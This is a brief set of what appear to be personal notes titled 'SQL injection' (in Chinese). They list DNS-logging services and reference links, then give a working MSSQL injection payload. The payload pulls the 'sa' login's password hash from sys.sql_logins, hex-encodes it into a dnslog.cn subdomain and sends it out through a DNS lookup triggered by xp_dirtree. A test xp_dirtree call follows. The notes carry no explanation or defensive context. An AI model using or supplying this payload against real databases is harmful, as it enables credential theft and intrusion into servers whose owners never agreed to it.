SQL注入

http://ceye.io

http://www.dnslog.cn/

 

https://www.anquanke.com/post/id/98096

https://mp.weixin.qq.com/s/MFKs80OcUdtUKmBO6WBcQA?

https://www.cnblogs.com/sunny11/p/14399420.html#_label0

 

dECLARE @host varchar(1024);

SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash)FROM sys.sql_logins WHERE name='sa')+'.ti2kqb.dnslog.cn';

EXEC('master..xp_dirtree"\\'+@host+'\foobar$"');

 

master..xp_dirtree"\\test.ti2kqb.dnslog.cn\foobar$"